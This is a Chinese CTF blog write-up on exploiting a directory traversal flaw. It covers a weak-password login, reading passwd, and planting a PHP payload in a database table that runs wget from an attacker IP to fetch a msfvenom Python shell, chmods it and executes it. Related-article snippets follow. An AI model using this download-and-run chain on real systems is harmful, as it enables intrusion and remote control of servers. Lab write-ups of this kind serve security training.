CTF-目录遍历漏洞

最新推荐文章于 2024-03-10 12:30:00 发布
最新推荐文章于 2024-03-10 12:30:00 发布
阅读量642 收藏 1
点赞数
分类专栏: CTF CTF-WEB 文章标签: 网络安全 系统安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Reaches_r/article/details/119458784
版权
CTF-WEB 同时被 2 个专栏收录
12 篇文章 0 订阅
订阅专栏
CTF
11 篇文章 0 订阅
订阅专栏

原理:当客户端访问到一个目录时,Apache服务器将会默认寻找一个index list中的文件,若文 件不存在,则会列出当前目录下所有文件或返回403状态码,而列出目录下所有文件的行为称为目录遍历。

1.扫描,看到个很admin有关的页面

2.老规矩试一下弱口令admin,进入成功,是个数据库后台管理页面 

3.使用AWVS扫描网站,有个目录遍历漏洞,根据漏洞详情在地址栏输入地址得到passwd的内容,说明这个漏洞可行

 3.这样就可以上传webshell,用目录遍历的方式启动。用msfvenom生成一个基于Python的webshell

4.在数据库后台新建一个数据库,创建一个表,并设置元组为1个

 

5.设置元组类型为txt,值为<?php system("cd /tmp;wget http://192.168.203.130:8000/shell.py;chmod 777 shell.py;python shell.py");?>,当访问数据库的时候系统会自动读取改值,并执行命令,相当于一个脚本

6.利用python建立简单http服务器

 

 7.复制路径,访问并取得权限

 

 

 

 

 

 

 

 

 

Reaches_r
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF训练 web安全目录遍历
qq_43613772的博客
06-13 4542
目录遍历漏洞介绍 路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。 需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。 这种攻击也称为“点-点斜线”、“...
CTFHUB之WEB—信息泄露(目录遍历和PHPINFO)
m0_56988395的博客
02-18 2003
一,目录遍历 考点 目录遍历漏洞(由于配置错误导致网站的目录可被遍历,一般该类漏洞可以为后续利用提供一些信息上的帮助) 存在问题 (1)操作系统没有限制对文件的访问权限。导致任何人都可访问文件目录,并且利用 …/…/ 可以实现文件回溯,访问父文件 (2)www目录下的文件结构被暴露 利用Google hacking语法 intitle:index of intext:Parent Directory 会很容易就被找到该url链接 后面的操作直接一个个点击查找就行 ...
目录遍历漏洞原理、解决方案
最新发布
qq_44005305的博客
03-10 2438
目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web目录以外的文件),甚至执行系统命令。
目录穿越/遍历漏洞及对其防御方法的绕过
2301_77004573的博客
04-30 3542
目录穿越(目录遍历)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。目录穿越不仅可以访问服务器中的任何目录,还可以访问服务器中任何文件的内容。例如,攻击者通过浏览器访问…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd(此处较多…/),就可以读取Linux服务器根目录下的etc目录下的passwd文件的内容。
目录遍历漏洞
夜行者的博客
02-18 5871
目录遍历漏洞是由于web中间件目录访问相关的配置错误造成的,该漏洞会泄露web应用程序的敏感路径、敏感的文件信息、网站的编辑器路径或测试接口、系统敏感目录(配合../等目录跳转符)等信息,从而给网站的安全带来威胁 检测方法: 主要有两种方式:手工测试和使用自动化扫描器。 1)手工测试:通过直接访问网站的各种目录(不加文件名和参数),如果显示了该目录下的文件和目录信息,证明存在该漏洞。 2)自动化扫描:一般使用大型的web漏洞扫描工具来进行自动测试,如awvs、w3af、APPscan、dirBust
tomcat temp 大量 upload 文件_渗透测试之文件上传漏洞总结
weixin_39726131的博客
12-05 672
文末下载上传环境源码客户端js检查一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。查看源代码可以看到有如下代码对上传文件类型进行了限制:我们可以看到对上传文件类型进行了限制。绕过方法1.我们直接删除代码中onsubmit事件中关于文件上传时验证上传文件的相关代码即可。或者可以不加载所有js,还可以将html源码copy一份到本地,然后对相...
CTF中文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 4万+
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
CTF指令收集
bouIevard的博客
07-14 916
CTF常用指令 Linux操作 1.给当前用户root权限: sudo su 2.安装软件 sudo apt-get install name 3.运行文件 ./filename 3.获取ip地址 ifconfig 4.查看当前目录下文件 ls 查看权限 ls -alh 5.进入目录 cd path 6.使用ssh文件登录ssh服务 ssh -i sshfilename username@ip 7.修改文件权限 chmod mode filename 其中mode如下: [ugoa][[±
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
ctf-tools-linux-master.zip
06-22
ctf集成工具包-linux版
CTF-Tools-v1.3.5
01-24
CTF-Tools-v1.3.5
ctf-wscan-master.zip
12-08
ctf-wscan-master.zip Linux下安装运行
CTF-命令执行
su__xiaoyan的博客
01-18 595
命令执行漏洞 当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。 调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。 实验环境 攻击机:192.168.0.25 靶机:192.168.0.26 实验流程 端口扫描 8080端口开放,HTTP服务
ctf 图片 php_一次ctf文件上传php代码审计
weixin_35753291的博客
03-09 717
朋友发的一个ctf题,做了好久才做出来,记录一下。0x01 源码highlight_file(__FILE__);@mkdir("./upload");if (isset($_POST['submit'])) {$is_upload = false;$text = null;if(!empty($_FILES['upload_file'])){$allow_type = array('image/...
目录遍历攻击详解
metheir的博客
01-08 8246
对于一个安全Web服务器来说,对Web内容进行恰当的访问控制是极为关键的。目录遍历是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并在Web服务器的根目录以外执行命令。   Web服务器主要提供两个级别的安全机制:   访问控制列表——就是我们常说的ACL   根目录访问   访问控制列表是用于授权过程的,它是一个Web服务器的管理员用来说明什么用户或用
路径遍历与文件读取漏洞以及其修复方案
pygain的博客
10-17 3万+
一些网站的业务需求,可能提供文件查看或下载功能,如果对用户查看或下载的文件不做限制,那么用户就能够查看和下载任意2文件,可以使源代码文件、敏感文件等
目录遍历攻击
大菜鸟的博客
02-11 2万+
原文地址:https://en.wikipedia.org/wiki/Directory_traversal_attack【译】目录遍历攻击一次目录遍历攻击(directory traversal attack)通常利用了“服务器安全认证缺失”或者“用户提供输入的文件处理操作”,使得服务器端文件操作接口执行了带有“遍历父文件目录”意图的恶意输入字符。 这种攻击的目的通常是利用服务器相关(存在安全
Spring Boot 目录遍历 (CVE-2021_21234)
小小猪的博客
12-31 4088
Spring Boot 目录遍历 (CVE-2021_21234) 漏洞简介: spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端
ctf 目录遍历 字典
05-14
CTF比赛中可能会出现目录遍历漏洞,可以使用字典来进行爆破,以下是一些常用的字典: 1. 相对路径字典:../、../../、../../../ 等 2. 绝对路径字典:/、//、///、/etc/、/root/ 等 3. 文件名字典:index.php、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Reaches_r

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值